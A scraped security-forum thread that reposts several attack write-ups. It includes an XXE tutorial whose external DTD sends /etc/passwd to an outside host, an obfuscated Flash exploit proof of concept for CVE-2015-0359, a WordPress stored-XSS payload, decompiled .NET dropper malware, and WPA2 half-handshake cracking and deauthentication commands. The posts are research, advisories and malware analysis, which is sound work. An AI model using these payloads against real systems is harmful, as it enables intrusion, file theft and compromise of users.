PowerShell payload, most notably including the Hidden attribute and the Bypass execution policy followed by a slew of Base64 that is the powershell/meterpreter/rev_https payload. The strings results on the left show when Invoke-Mimikatz.ps1 was actually executed. Four quick steps with Rekall and we’ve, in essence, reversed the steps described in the attack phase. Remember too, we could just as easily have conducted these same step on a live victim system with the same plugins via the following: rekal -f \\.\pmem netstat rekal -f \\.\pmem pstree rekal -f \\.\pmem malfind pid=1284, dump_dir="/tmp/" rekal -f \\.\pmem memdump pid=2396, dump_dir="/tmp/" In Conclusion In celebration of the annual infosec tools addition, we’ve definitely gone a bit hog wild, but because it has been for me, I have to imagine you’ll find this level of process and detail useful. Michael and team have done wonderful work with Rekall and WinPmem. I’d love to hear your feedback on your usage, particularly with regard to close, cooperative efforts between your red and blue teams. If you’re not yet using these tools yet, you should be, and I recommend a long, hard look at GRR as well. I’d also like to give more credit where it’s due. In addition to Michael Cohen, other tools and tactics here were developed and shared by people who deserve recognition. They include Microsoft’s Mike Fanning, root9b’s Travis Lee (@eelsivart), and Laconicly’s Billy Rios (@xssniper). Thank you for everything, gentlemen. Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec). Cheers…until next month. Acknowledgements Michael Cohen, Rekall/GRR developer and project lead (@scudette) Posted by Russ McRee at 8:50 AM Sursa: http://holisticinfosec.blogspot.ro/2015/05/toolsmith-attack-detection-hunting-in.html

Si bozgorii?

The "cum il folosesc?" questions are coming.

Daca afiseaza numele fisierului (care contine entitatea respectiva, adica continutul /etc/passwd) atunci ar trebui sa fie afisat complet. Da, depinde si de asta, dar e o idee care poate fi utila.

Forcing XXE Reflection through Server Error Messages Antti Rantasaari | May 4, 2015 XML External Entity (XXE) injection attacks are a simple way to extract files from a remote server via web requests. For easy use of XXE, the server response must include a reflection point that displays the injected entity (remote file) back to the client. Below is an example of a common XXE injection request and response. The injections have been bolded in red. HTTP Request: POST /netspi HTTP/1.1 Host: someserver.netspi.com Accept: application/json Content-Type: application/xml Content-Length: 288 <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <root> <search>name</search> <value>&netspi;</value> </root> HTTP Response: HTTP/1.1 200 OK Content-Type: application/xml Content-Length: 2467 <?xml version="1.0" encoding="UTF-8"?> <errors> <error>no results for name root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync.... </error> </errors> However, it’s also very common for nothing to be returned in the error response if the application doesn’t reflect any user input back to the client. This can make simple XXE attacks harder. If connections are allowed to remote systems from the vulnerable server then it’s possible to use an external DTD to extract local files via web requests. This technique has been covered in greater detail at this whitepaper but below is an overview of how the modified XXE injection technique works and can be executed. Host a .dtd file on a web server that is accessible from the vulnerable system. In my example the “netspi.dtd” file is hosted on xxe.netspi.com. The DTD file contains a XXE injection that will send the contents of the /etc/password file to the web server at Not Found. <!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % param1 '<!ENTITY % external SYSTEM "http://xxe.netspi.com/x=%payload;">'> %param1; %external; Next, the attack can be executed by referencing the hosted DTD file as shown below. The request does not even have to contain any XML body, for as long as the server processes XML requests. HTTP Request: POST /netspi HTTP/1.1 Host: someserver.netspi.com Accept: application/json Content-Type: application/xml Content-Length: 139 <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE foo SYSTEM "http://xxe.netspi.com/netspi.dtd"> <root> <search>name</search> </root> At this point the XXE attack results in a connection to xxe.netspi.com to load the external DTD file. The hosted DTD file then uses parameter entities to wrap the contents of the /etc/passwd file into another HTTP request to xxe.netspi.com. Now it may be possible to extract the contents of /etc/passwd file without having a reflection point on the page itself, but by reading incoming traffic on xxe.netspi.com. The file contents can be parsed from web server logs or from an actual page. I should note that only a single line of /etc/passwd can be read using this method, or the HTTP request may fail altogether because of line breaks in the target file. There is another option though. In some cases it’s also possible to make data extraction easier by forcing an error on the server by adding an invalid URI to the request. Below is an example of a modified DTD: <!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % param1 '<!ENTITY % external SYSTEM "file:///nothere/%payload;">'> %param1; %external; If the server displays verbose errors to client, the error may contain the file contents of the file that’s getting extracted. Below is an example: HTTP Response: HTTP/1.1 500 Internal Server Error Content-Type: application/xml Content-Length: 2467 <?xml version="1.0" encoding="UTF-8"?><root> <errors> <errorMessage>java.io.FileNotFoundException: file:///nothere/root:x:0:0:root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync.... The invalid file path causes a “FileNotFoundException”, and an error message that contains /etc/passwd file contents. This same technique was recently covered in this Drupal XXE whitepaper as well but as I had the blog written I thought I could as well publish it References https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing http://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf Sursa: https://blog.netspi.com/forcing-xxe-reflection-server-error-messages/

Flash_Exploit.SWF CVE-2015-0359 PoC BY: _D3F4ULT package { public class $1$6$7$@120984$cQhWvZ56 { } $1$6$7$@120984$cQhWvZ56 = [OP_NEWCLASS ClassInfo:0 base:Object]; 34643$OfA2FuRBJ#@ = [OP_NEWCLASS ClassInfo:1 base:MovieClip]; 3m3qT@@9jm4 = [OP_NEWCLASS ClassInfo:2 base:Object]; 6KovfYYrEFkW = [OP_NEWCLASS ClassInfo:3 base:ByteArray]; }//package import flash.display.*; import flash.system.*; import flash.utils.*; package { public class 34643$OfA2FuRBJ#@ extends MovieClip { private var 13AFv7jyfFP; private var YWH9DbQhT:Class; private var 65%$uHPix2Gq4k%ss = "ToStage"; private var _StrPool46:uint = 0; private var %%Awjftgdfe^&:uint = 0; private var X4O3S0e:uint = 0xFF; private var 3eMXkL2fIA; private var 86OI8FG3RS4; public function 34643$OfA2FuRBJ#@(_arg1:Object=null){ Security[((("al" + "low") + "Dom") + "ain")]("*"); var _local2:* = ApplicationDomain[(("current" + "Do") + "main")]; this.65%$uHPix2Gq4k%ss = (("ad" + "ded") + this.65%$uHPix2Gq4k%ss); var _local4 = (_local2[("getD" + "efinition")]("flash.display.Loader") as Class); this.13AFv7jyfFP = new (_local4)(); this.YWH9DbQhT = (_local2[("getD" + "efinition")]("flash.utils.ByteArray") as Class); if (this["stage"]){ this.4kjf1flZV1ZTA7(); } else { this["addEventListener"](this.65%$uHPix2Gq4k%ss, this.4kjf1flZV1ZTA7); }; } public function EmptyHandler(_arg1:Object, _arg2:int):void{ _arg2++; } private function 4kjf1flZV1ZTA7(_arg1:Object=null):void{ this[(("rem" + "oveEven") + "tListener")](this.65%$uHPix2Gq4k%ss, this.4kjf1flZV1ZTA7); this["addEventListener"]("enterFrame", this.TVN3N5UQ); var _local2:* = new 6KovfYYrEFkW(); var _local3:* = new this.YWH9DbQhT(); this.$$!!323tr(); this.ym9LDy3rDi8Fz(_local2, _local2["length"], _local3); this.gzZrsob66e0cB6oT(_local3); var _local4:uint = 91; var _local5 = 0; if ((_local5 < _local3["length"])){ var _local6:uint = (_local3[_local5] ^ _local4); _local4 = _local3[_local5]; _local3[_local5] = _local6; _local5++; //unresolved jump }; var _local8 = "com"; _local3[((("un" + _local8) + "pres") + "s")](); this.13AFv7jyfFP[("load" + "Bytes")](_local3); this[("add" + "Child")](this.13AFv7jyfFP); //unresolved jump !ERROR! return; } private function TVN3N5UQ(_arg1):void{ if ((this.currentFrame == 200)){ this.gotoAndPlay(new Number(2)); return; }; } private function $$!!323tr():void{ this.3eMXkL2fIA = new this.YWH9DbQhT(); this.86OI8FG3RS4 = new this.YWH9DbQhT(); var _local2:int; _local2 = 65; if ((_local2 < 91)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; _local2 = 97; if ((_local2 < 123)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; _local2 = 48; if ((_local2 < 58)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; _local2 = 33; if ((_local2 < 48)){ if ((((((_local2 == 34)) || ((_local2 == 39)))) || ((_local2 == 45)))){ } else { this.86OI8FG3RS4["writeByte"](_local2); }; _local2++; //unresolved jump }; _local2 = 58; if ((_local2 < 65)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; _local2 = 91; if ((_local2 < 97)){ if ((_local2 == 92)){ } else { this.86OI8FG3RS4["writeByte"](_local2); }; _local2++; //unresolved jump }; _local2 = 123; if ((_local2 < 127)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; this.86OI8FG3RS4["writeByte"](34); var _local3:int; _local3 = 0; if ((_local3 < 0xFF)){ this.3eMXkL2fIA[_local3] = 0xFF; _local3++; //unresolved jump }; _local3 = 0; if ((_local3 < this.86OI8FG3RS4["length"])){ this.3eMXkL2fIA[this.86OI8FG3RS4[_local3]] = _local3; _local3++; //unresolved jump }; } public function gzZrsob66e0cB6oT(_arg1):uint{ var _local2:uint = 0; if (!((this.X4O3S0e == 0xFF))){ _arg1[_arg1["length"]] = (this._StrPool46 | (this.X4O3S0e << this.%%Awjftgdfe^&)); _local2 = (_local2 + 1); }; return (_local2); } public function ym9LDy3rDi8Fz(_arg1, _arg2:uint, _arg3):uint{ var _local4 = 0; var _local5:uint = 0; _local4 = 0; if ((_local4 < _arg2)){ if ((this.3eMXkL2fIA[_arg1[_local4]] == 0xFF)){ } else { if ((this.X4O3S0e == 0xFF)){ this.X4O3S0e = this.3eMXkL2fIA[_arg1[_local4]]; } else { this.X4O3S0e = (this.X4O3S0e + (this.3eMXkL2fIA[_arg1[_local4]] * this.86OI8FG3RS4["length"])); this._StrPool46 = (this._StrPool46 | (this.X4O3S0e << this.%%Awjftgdfe^&)); this.%%Awjftgdfe^& = (this.%%Awjftgdfe^& + ((((this.X4O3S0e & 8191) > 88)) ? 13 : 14)); var _local7 = _local5; _local5 = (_local7 + 1); _arg3[_local7] = (this._StrPool46 & 0xFF); this._StrPool46 = (this._StrPool46 >> 8); this.%%Awjftgdfe^& = (this.%%Awjftgdfe^& - 8); //unresolved if this.X4O3S0e = 0xFF; }; }; _local4++; //unresolved jump }; return (_local5); } } }//package package { public class 3m3qT@@9jm4 { } }//package package { public class 6KovfYYrEFkW extends ByteArray { public function 9IRh0mi4XOG():void{ } public function A3Ig1if():int{ return (0); } } }//package "twitter.com/_d3f4ult"Via: http://pastebin.com/5nnP7X0x

Writing a Metasploit post exploitation module April 6, 2015 Ionut Popescu The exploitation of a machine is only a step in a penetration test. What you do next? How can you pivot from the exploited machine to other machines in the network? This is the step where you need to prove you post exploitation skills. Even if Metasploit is a complex framework, it is not complete and you can extend it. Why would I write one? Metasploit is the “World’s most used penetration testing software”, it contains a huge collection of modules, but it is not complete and you can customize it by writing your own modules.Even if you manage to compromise a machine, you may ask yourself: “Now what?”. You can use one of the many Metasploit post exploitation modules, but what if you don’t find a suitable module for you? You may request it to the Metasploit community and developers but it may take a lot of time until it will be available. So why don’t you try to write your own module? Articol complet: Writing a Metasploit post exploitation module – Security Café

E relativ. Opcode-ul "eb 17" == "sari 0x17 bytes" 8048062 (adresa urmatoare) + 0x17 == 8048079 E ciudat ca e "jmp 8048079" si nu "jmp 08048078" pentru ca la "08048078" se afla acel call care pune pe stack "/bin/sh". A, pula. Daca te uiti in shellcode-ul din programul C: \xeb\x16\x5e\x31 Este "eb 16" adica "jmp 08048078".

Probabil iti plac femeile din Coreea sau Japonia, nu China.

Malware. Copiaza un rahat (prost bindat, non-encrypted) in AppData. Dracia e scrisa in .NET si se vede usor: [COLOR=#1000a0]public[/COLOR] [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Object"]object[/URL] [B][URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Xtraer():Object"]Xtraer[/URL][/B]() { [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Object"]object[/URL] [B]obj2[/B]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Int32"]int[/URL] [B]num2[/B]; [COLOR=#1000a0]try[/COLOR] { [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Int32"]int[/URL] [B]num3[/B]; [B]Label_0001[/B]: [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.CompilerServices.ProjectData"]ProjectData[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.CompilerServices.ProjectData/ClearProjectError()"]ClearProjectError[/URL](); [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Int32"]int[/URL] [B]num[/B] = [COLOR=#800000]-2[/COLOR]; [B]Label_0009[/B]: num3 = [COLOR=#800000]2[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem"]FileSystem[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem/FileOpen(Int32,String,Microsoft.VisualBasic.OpenMode,Microsoft.VisualBasic.OpenAccess,Microsoft.VisualBasic.OpenShare,Int32)"]FileOpen[/URL]([COLOR=#800000]1[/COLOR], [COLOR=#1000a0]this[/COLOR].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Ruta1:String"]Ruta1[/URL] + [COLOR=#800000]@"\ndwkdwmm.exe"[/COLOR], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenMode"]OpenMode[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenMode/Binary"]Binary[/URL], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenAccess"]OpenAccess[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenAccess/ReadWrite"]ReadWrite[/URL], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenShare"]OpenShare[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenShare/Shared"]Shared[/URL], [COLOR=#800000]-1[/COLOR]); [B]Label_0028[/B]: num3 = [COLOR=#800000]3[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem"]FileSystem[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem/FilePut(Int32,String,Int64,Boolean)"]FilePut[/URL]([COLOR=#800000]1[/COLOR], [COLOR=#1000a0]this[/COLOR].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Dat:String%5b%5d"]Dat[/URL][[COLOR=#800000]1[/COLOR]], [COLOR=#800000]-1[/COLOR][COLOR=#800000]L[/COLOR], [COLOR=#800000]false[/COLOR]); [B]Label_003D[/B]: num3 = [COLOR=#800000]4[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem"]FileSystem[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem/FileClose(Int32%5b%5d)"]FileClose[/URL]([COLOR=#1000a0]new[/COLOR] [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Int32"]int[/URL][] { [COLOR=#800000]1[/COLOR] }); [B]Label_0052[/B]: num3 = [COLOR=#800000]5[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.Interaction"]Interaction[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.Interaction/Shell(String,Microsoft.VisualBasic.AppWinStyle,Boolean,Int32):Int32"]Shell[/URL]([COLOR=#1000a0]this[/COLOR].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Ruta1:String"]Ruta1[/URL] + [COLOR=#800000]@"\ndwkdwmm.exe"[/COLOR], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.AppWinStyle"]AppWinStyle[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.AppWinStyle/NormalFocus"]NormalFocus[/URL], [COLOR=#800000]false[/COLOR], [COLOR=#800000]-1[/COLOR]); [B]Label_006E[/B]: num3 = [COLOR=#800000]6[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem"]FileSystem[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem/FileOpen(Int32,String,Microsoft.VisualBasic.OpenMode,Microsoft.VisualBasic.OpenAccess,Microsoft.VisualBasic.OpenShare,Int32)"]FileOpen[/URL]([COLOR=#800000]2[/COLOR], [COLOR=#1000a0]this[/COLOR].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Ruta2:String"]Ruta2[/URL] + [COLOR=#800000]@"\lklslslowlsloloaolsl.exe"[/COLOR], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenMode"]OpenMode[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenMode/Binary"]Binary[/URL], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenAccess"]OpenAccess[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenAccess/ReadWrite"]ReadWrite[/URL], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenShare"]OpenShare[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenShare/Shared"]Shared[/URL], [COLOR=#800000]-1[/COLOR]); [B]Label_008D[/B]: num3 = [COLOR=#800000]7[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem"]FileSystem[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem/FilePut(Int32,String,Int64,Boolean)"]FilePut[/URL]([COLOR=#800000]2[/COLOR], [COLOR=#1000a0]this[/COLOR].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Dat:String%5b%5d"]Dat[/URL][[COLOR=#800000]2[/COLOR]], [COLOR=#800000]-1[/COLOR][COLOR=#800000]L[/COLOR], [COLOR=#800000]false[/COLOR]); [B]Label_00A2[/B]: num3 = [COLOR=#800000]8[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem"]FileSystem[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem/FileClose(Int32%5b%5d)"]FileClose[/URL]([COLOR=#1000a0]new[/COLOR] [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Int32"]int[/URL][] { [COLOR=#800000]2[/COLOR] }); [B]Label_00B7[/B]: num3 = [COLOR=#800000]9[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.Interaction"]Interaction[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.Interaction/Shell(String,Microsoft.VisualBasic.AppWinStyle,Boolean,Int32):Int32"]Shell[/URL]([COLOR=#1000a0]this[/COLOR].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Ruta2:String"]Ruta2[/URL] + [COLOR=#800000]@"\lklslslowlsloloaolsl.exe"[/COLOR], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.AppWinStyle"]AppWinStyle[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.AppWinStyle/NormalFocus"]NormalFocus[/URL], [COLOR=#800000]false[/COLOR], [COLOR=#800000]-1[/COLOR]); Scan real: https://www.virustotal.com/ro/file/8c6ac3cac91fe069cf49888f81eecc11733b788cc8bb0eb4b40e96dc2460f108/analysis/1430732314/

Dezactivati "Facebook platform" din setarile de la Facebook.

WordPress 4.2 stored XSS From: Jouko Pynnonen <jouko () iki fi>Date: Mon, 27 Apr 2015 05:15:46 +0300 OVERVIEW ========== Current versions of WordPress are vulnerable to a stored XSS. An unauthenticated attacker can inject JavaScript in WordPress comments. The script is triggered when the comment is viewed. If triggered by a logged-in administrator, under default settings the attacker can leverage the vulnerability to execute arbitrary code on the server via the plugin and theme editors. Alternatively the attacker could change the administrator’s password, create new administrator accounts, or do whatever else the currently logged-in administrator can do on the target system. DETAILS ======== If the comment text is long enough, it will be truncated when inserted in the database. The MySQL TEXT type size limit is 64 kilobytes so the comment has to be quite long. The truncation results in malformed HTML generated on the page. The attacker can supply any attributes in the allowed HTML tags, in the same way as with the two other recently published stored XSS vulnerabilities affecting the WordPress core. The vulnerability bears a similarity to the one reported by Cedric Van Bockhaven in 2014 (patched this week, after 14 months). Instead of using an invalid UTF-8 character to truncate the comment, this time an excessively long comment text is used for the same effect. In these two cases the injected JavaScript apparently can't be triggered in the administrative Dashboard, so these exploits require getting around comment moderation e.g. by posting one harmless comment first. PROOF OF CONCEPT ================== Enter the following as a comment: <a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA [64 kb] ...'></a> This was tested on WordPress 4.2, 4.1.2, and 4.1.1, MySQL versions 5.1.53 and 5.5.41. SOLUTION ========= Disable comments (Dashboard, Settings/Discussion, select as restrictive options as possible). Do not approve any comments. CREDITS ======== The vulnerability was discovered by Jouko Pynnönen of Klikki Oy. An up-to-date version of this document: http://klikki.fi/adv/wordpress2.html -- Jouko Pynnönen <jouko () iki fi> Klikki Oy - http://klikki.fi - @klikkioy Sursa: Bugtraq: WordPress 4.2 stored XSS

Forta

Conventional WPA2 attacks work by listening for a handshake between client and Access Point. This full fourway handshake is then used in a dictonary attack. This tool is a Proof of Concept to show it is not necessary to have the Access Point present. A person can simply listen for WPA2 probes from any client withen range, and then throw up an Access Point with that SSID. Though the authentication will fail, there is enough information in the failed handshake to run a dictionary attack against the failed handshake. Install $ sudo python setup.py install Sample use $ python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like 127.0.0.1" -r Where to read input pcap file with half handshake (works with full handshakes too) -m AP mac address (From the 'fake' access point that was used during the capture) -s AP SSID -d (optional) Where to read dictionary from Capturing half handshakes To listen for device probes the aircrack suite can be used as follows sudo airmon-ng start wlan0 sudo airodump-ng mon0 You should begin to see device probes with BSSID set as (not associated) appearing at the bottom. If WPA2 SSIDs pop up for these probes, these devices can be targeted Setup a WPA2 wifi network with an SSID the same as the desired device probe. The passphrase can be anything In ubuntu this can be done here 3 Ways to Create Wifi Hotspot in Ubuntu 14.04 (Android Support) | UbuntuHandbook Capture traffic on this interface. In linux this can be achived with TCPdump sudo tcpdump -i wlan0 -s 65535 -w file.cap (optional) Deauthenticate clients from nearby WiFi networks to increase probes If there are not enough unassociated clients, the aircrack suite can be used to deauthenticate clients off nearby networks deauthentication [Aircrack-ng] Sursa: https://github.com/dxa4481/WPA2-HalfHandshake-Crack

Contents 1. NtGlobalFlag ...................................................................................................................... 5 2. Heap flags ........................................................................................................................... 8 3. The Heap ............................................................................................................................. 15 4. Thread Local Storage ................................................................................................... 19 5. Anti-Step-Over ................................................................................................................ 25 6. Hardware ............................................................................................................................. 29 A. Hardware breakpoints ............................................................................................... 29 B. Instruction Counting ............................................................................................... 30 C. Interrupt 3 ................................................................................................................... 34 D. Interrupt 0x2d ............................................................................................................ 35 E. Interrupt 0x41 ............................................................................................................ 36 F. MOV SS .............................................................................................................................. 37 7. APIs ...................................................................................................................................... 38 A. Heap functions ............................................................................................................ 38 B. Handles ............................................................................................................................ 41 i. OpenProcess ............................................................................................................... 41 ii. CloseHandle ............................................................................................................. 44 iii. CreateFile ............................................................................................................. 48 iv. LoadLibrary ............................................................................................................. 53 v. ReadFile ...................................................................................................................... 55 C. Execution Timing ........................................................................................................ 57 D. Process-level............................................................................................................... 62 i. CheckRemoteDebuggerPresent .............................................................................. 62 ii. Parent Process ...................................................................................................... 63 iii. CreateToolhelp32Snapshot .............................................................................. 65 iv. DbgBreakPoint......................................................................................................... 79 v. DbgPrint ...................................................................................................................... 80 vi. DbgSetDebugFilterState ..................................................................................... 82 vii. IsDebuggerPresent.............................................................................................. 83 viii. NtQueryInformationProcess .......................................................................... 84 ix. OutputDebugString ................................................................................................ 88 x. RtlQueryProcessHeapInformation ..................................................................... 90 xi. NtQueryVirtualMemory ......................................................................................... 91 xii. RtlQueryProcessDebugInformation ............................................................... 92 xiii. SwitchToThread .................................................................................................. 94 xiv. Toolhelp32ReadProcessMemory........................................................................ 95 xv. UnhandledExceptionFilter ................................................................................ 97 xvi. VirtualProtect .................................................................................................... 98 E. System-level ............................................................................................................... 100 i. FindWindow ............................................................................................................... 100 ii. NtQueryObject....................................................................................................... 102 iii. NtQuerySystemInformation ............................................................................ 105 iv. Selectors ............................................................................................................... 115 F. User-interface .......................................................................................................... 118 i. BlockInput ............................................................................................................... 118 ii. FLD............................................................................................................................. 120 iii. NtSetInformationThread................................................................................. 121 iv. SuspendThread....................................................................................................... 122 v. SwitchDesktop ......................................................................................................... 123 G. Uncontrolled execution ......................................................................................... 124 i. CreateProcess ......................................................................................................... 125 ii. CreateThread ......................................................................................................... 130 iii. DebugActiveProcess ......................................................................................... 131 iv. Enum... .................................................................................................................... 134 v. GenerateConsoleCtrlEvent................................................................................. 134 vi. NtSetInformationProcess................................................................................. 136 vii. NtSetLdtEntries ................................................................................................ 137 viii. QueueUserAPC .................................................................................................... 138 ix. RaiseException .................................................................................................... 139 x. RtlProcessFlsData ................................................................................................ 141 xi. WriteProcessMemory............................................................................................ 142 xii. Intentional exceptions................................................................................. 143 H. Conclusion ................................................................................................................... 146 Download: http://pferrie.host22.com/papers/antidebug.pdf

